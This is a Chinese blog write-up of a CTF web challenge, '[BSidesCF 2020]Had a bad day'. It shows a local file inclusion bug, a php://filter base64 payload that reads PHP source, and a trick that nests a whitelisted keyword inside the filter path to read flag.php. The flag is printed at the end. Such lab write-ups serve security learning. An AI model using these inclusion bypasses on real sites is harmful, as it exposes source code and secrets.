[BUUOJ记录] [BSidesCF 2020]Had a bad day
2024-10-06 00:49:53
主要考察文件包含以及php://filter伪协议的一个小trick。题目很简单,但是因为不知道这个trick卡了很久,记录一下
进入题目看到有两个按钮,没有其他信息:
点击按钮显示出来一张图片,然后发现URL变成了:
http://0d01386f-60a4-4890-9723-b12f3a9eb35c.node3.buuoj.cn/index.php?category=woofers
怀疑是SQL注入或者是文件包含,随便输入一个值返回了PHP报错:
确定是文件包含漏洞,直接包含/flag发现包含不到,先用php://filter伪协议读一下index.php源码看看:
php://filter/read=convert.base64-encode/resource=index
(这里构造成php://filter/read=convert.base64-encode/resource=index.php是会报错的,因为后端给文件后拼接了“.php”)
得到index.php源码:
......<以上HTML省略>
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){ //必须含有woofers或meowers或index字符串
include ($file . '.php'); //参数后拼接.php
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
......<以下HTML省略>
利用include函数特性包含一下flag.php文件试试:
index.php?category=woofers/../flag
发现源码中多出了一些东西,说明flag.php被包含了进去:
接下来的问题就是如何读取到flag.php的源码。
这里卡了好久,后来请教了几位师傅才知道php://filter伪协议可以套一层协议,就像:
php://filter/read=convert.base64-encode/woofers/resource=index
这样提交的参数既包含有woofers这个字符串,也不会影响正常的包含,得到Flag.php:
解码得到Flag:
<!-- Can you read this flag? -->
<?php
// flag{a4aaba40-84f9-4b7a-b269-d025b03676a1}
?>
最新文章
- ubuntu sudo update与upgrade的作用及区别
- 如何判断js中的数据类型
- Linux_磁盘管理
- Mysql备份迁移——Mysqldump(.NET调用Mysqldump.exe方式)——(解决视图嵌视图报错)
- HttpURLConnection请求网络数据
- 如何解决adb devices 端口被占用的问题zz
- glsl计算sprite的亮度饱和度对比度
- Java多线程之notifyAll的作用域
- java 反射机制探究
- 系统学下POWERSHELL吧,工作当中可能用得到呢。不能像以前那样修修改改了。
- VC,一条会被鼠标移动的直线
- 解释内存中的栈(stack)、堆(heap)和静态区(static area)的用法
- 终于开始我的java旅程了!
- Open Cygwin at a specific folder
- 我的WafBypass之道(SQL注入篇)
- 解决vue单页路由跳转后scrollTop的问题
- PSPnet模型结构的实现代码
- MS16-032 漏洞复现
- 第二阶段——个人工作总结DAY08
- [UE4]给Widget增加参数,Pre Construct和Construct的区别